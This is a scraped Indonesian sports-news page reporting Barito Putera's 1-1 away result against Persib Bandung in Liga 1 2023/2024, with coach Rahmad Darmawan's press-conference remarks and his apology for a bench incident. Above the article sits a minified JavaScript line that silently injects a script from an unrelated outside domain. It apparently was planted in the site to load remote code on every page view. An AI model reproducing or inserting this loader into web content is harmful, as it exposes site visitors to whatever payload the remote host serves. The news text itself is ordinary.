(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Sepak Bola

Bisa Lewati Misi Sulit Lawan Persib Bandung


KANALKALIMANTAN.COM, BANJARMASIN – Misi sulit Barito Putera untuk melawan tim besar di Indonesia yakni Persib Bandung di laga away pekan ke-8 Liga 1 2023/2024 terbilang sukses.

Pasalnya, laga yang berlangsung di Stadion Gelora Bandung Lautan Api (GBLA) Bandung pada Minggu (13/8/2023) sore, membawa tim besutan Rahmad Darmawan (RD) bertengger ke puncak klasemen sementara.

Setelah Madura United sukses membawa pulang 3 poin usai melawan Persija, Laskar Antasari dengan 14 poin turun ke posisi dua klasemen sementara dalam 8 kali laga.

Meski harus kecolongan di awal babak pertama, Laskar Antasari mampu menahan serangan Maung Bandung dengan cukup efektif.

Baca juga: RD Minta Maaf atas Insiden di Laga Persib Kontra Barito Putera

Hal itu disampaikan Pelatih Barito Putera, Rahmad Darmawan (RD) saat sesi jumpa pers, Minggu (13/8/2023) sore.

“Kita mengawali permainan dengan cukup efektif, kita mampu untuk mengeliminir beberapa strong poin yang dimiliki Persib dengan tidak memberikan ruang terlalu mudah kepada mereka untuk mengalirkan bola ke strikernya lewat dua winger yang sangat berbahaya,” ungkap coach RD kepada awak media.

RD menuturkan, kedua pemain asingnya yakni Makan Konate dan juga Mike Ott, pada babak pertama kurang mendekati kedua strikernya saat mendapatkan bola, hal itu membuat timnya tidak berani untuk keluar.

Meski begitu pada babak kedua berlanjut, Coach RD meminta para pemainnya untuk lebih tenang dan berani dalam membongkar pertahanan Persib.

Baca juga: Pengguna QRIS di Kalsel Mencapai 475 Ribu

“Di babak kedua kita mulai meminta pemain untuk lebih tenang lagi dan berani masuk ke area penalti box, dengan membuat beberapa variasi serangan, tidak terlalu monoton, jangan ragu, jangan takut, itu yang saya ingatkan kepada mereka, ada beberapa momen yang diciptakan, Alhamdulillah dikasih gol satu,” imbuh dia.

Ketenangan tersebut akhirnya membuahkan hasil hingga Laskar Antasari sukses mencetak gol menyeimbangkan kedudukan.

“Saya pikir mereka lebih berani untuk masuk ke kotak penalti, lebih berani untuk membuat variasi serangan dan itu dilakukan di babak kedua dan lumayan hasilnya,” sambung dia.

Sementara itu menanggapi keadaan panas yang sempat terjadi di area bench antara dirinya dengan tim pelatih Persib, Coach RD mengaku tidak mempersalahkannya.

Baca juga: Laskar Antasari Puncaki Klasemen BRI Liga 1

Saat itu, dia mengatakan bahwa dirinya hanya mencoba mengingatkan agar seluruh elemen yang berada di dalam lapangan dapat menghargai kinerja seluruh perangkat pertandingan.

“Pada kesempatan ini saya juga meminta maaf atas insiden yang tadi terjadi, sunggung saya tidak bermaksud apa-apa kecuali saya ingin mengingatkan mari semua kita berlatih menghargai kinerja perangkat pertandingan salah satunya wasit,” jelas RD.

Menurutnya, semua pelatih termasuk pelatih asing yang masuk ke dalam lapangan dapat memberikan edukasi serta memberikan sesuatu yang positif agar bisa ditiru dan juga dicontoh.

“Jadi bukan menjadi dirijen untuk mengontrol apa yang dikehendaki dengan terus memberikan protes, jadi itu tadi saya meminta maaf mungkin ada kesalahpahaman karena terkena kartu kuning tapi gak ada masalah buat saya,” tandasnya.

Baca juga: Lebih Hemat Pakai Kendaraan Listrik, Masyarakat Nikmati Beragam Kemudahan

Menutup sesi jumpa pers ini, pemain gelandang Barito Putera Buyung Ismu mengatakan akan kembali bekerja keras demi membawa kesuksesan di pertandingan selanjutnya.

“Secara pribadi saya mengucap syukur atas sayu poin yang kita raih dan saya sebagai pemain akan terus bekerja keras agar pertandingan-pertandingan berikutnya kita akan menghasilkan yang lebih baik lagi,” tutup Buyung. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

47 menit ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

58 menit ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

4 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

16 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

17 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

18 jam ago

This website uses cookies.